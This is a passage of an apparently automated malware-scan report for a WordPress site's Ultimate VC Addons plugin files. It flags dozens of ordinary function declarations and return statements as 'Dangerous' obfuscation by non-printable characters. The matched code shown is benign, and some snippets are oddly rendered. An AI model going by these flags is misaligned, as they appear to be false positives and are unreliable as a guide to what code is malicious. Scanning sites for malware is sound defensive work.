<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } function </span><span style="color: #0000BB">ultimate_createlink</span><span style="color: #007700">() { if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Creative Link"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_createlink"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon"</span><span style="color: #007700">=></span><span style="color: #DD0000">"uvc_creative_link"</span><span style="color: #007700">, </span><span style="color: #DD0000">"category" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Ultimate VC Addons"</span><span style="color: #007700">,</span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">), </span><span style="color: #DD0000">"description" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Ad</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">creative_link_scripts</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_createlink_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_createlink</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_312").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_info_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_313" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'info-box-style'</span><span style="color: #007700">, </span><span style="color: #DD0000">'info-box' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'info_box_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'info-box' </span><span style="color: #007700">); } }} if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'AIO_Icons_Box'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$AIO_Icons_Box </span><span style="color: #007700">= new </span><span style="color: #0000BB">AIO_Icons_Box</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_boxes</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_init</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #DD0000">'vc_map'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 801</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_313").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_spacer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.29 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_314" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Spacer</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_spacer' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_spacer </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacer_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacer_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_314").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_icon_manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 25.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 35</span><br><table id="file_315" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$created</span><span style="color: #007700">; } } } </span><span style="color: #0000BB">$AIO_Icon_Manager </span><span style="color: #007700">= new </span><span style="color: #0000BB">AIO_Icon_Manager</span><span style="color: #007700">; </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_ajax_smile_ajax_add_zipped_font'</span><span style="color: #007700">, array( </span><span style="color: #0000BB">$AIO_Icon_Manager</span><span style="color: #007700">, </span><span style="color: #DD0000">'add_zipped_font' </span><span style="color: #007700">) ); </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_ajax_smile_ajax_remove_zipped_font'</span><span style="color: #007700">, array( </span><span style="color: #0000BB">$AIO_Icon_Manager</span><span style="color: #007700">, </span><span style="color: #DD0000">'remove_zipped_font' </span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_manager_dashboard</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_font_manager</span><span style="color: #007700">( </span><span style="color: #0000BB">$id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_font_set</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_zipped_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_zipped_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">zip_flatten</span><span style="color: #007700">( </span><span style="color: #0000BB">$zipfile</span><span style="color: #007700">, </span><span style="color: #0000BB">$filter </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 382</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_config</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 453</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">write_config</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">re_write_css</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 500</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rename_files</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 514</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rename_folder</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_folder</span><span style="color: #007700">( </span><span style="color: #0000BB">$new_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_all_fonts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 557</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_font</span><span style="color: #007700">( </span><span style="color: #0000BB">$font </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 580</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_svg</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 599</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_iconfont_list</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$iconlist</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 621</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$font_configs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 624</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">AIO_move_fonts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_icon_manager</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$icon </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'smile_backend_create_folder' </span><span style="color: #007700">) ) {</span>
</span>
